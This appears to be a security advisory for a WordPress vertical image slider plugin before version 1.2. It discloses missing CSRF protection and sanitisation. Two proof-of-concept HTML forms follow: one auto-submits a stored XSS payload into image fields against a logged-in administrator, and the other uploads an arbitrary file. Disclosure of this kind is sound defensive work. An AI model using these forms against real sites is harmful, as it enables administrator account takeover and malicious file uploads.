wordpress vertical image slider plugin < 1.2 – Cross-Site Scripting & CSRF

Description

The lack of CSRF check and sanitisation could allow attackers to perform Cross-Site Scripting attack against logged in administrator, as well as upload arbitrary files

Proof of Concept

XSS via CSRF:

<form method="post" name="form1"  
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"  
enctype="multipart/form-data">
<input type="hidden" name="imagetitle"  
value='"><script>alert("XSS")</script>'>
<input type="hidden" name="imageurl" value='"><script>alert("XSS")</script>'>
<input type="file" name="image_name" />
<input type="submit" name="btnsave" value="Save Changes">
</form>
<script type="text/javascript">
setTimeout('form1.submit()', 1);
</script>

Upload file via CSRF:
<form method="post"  
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"  
enctype="multipart/form-data">
<input type="file" name="image_name" />
<input type="submit" name="btnsave" value="Save Changes">
</form>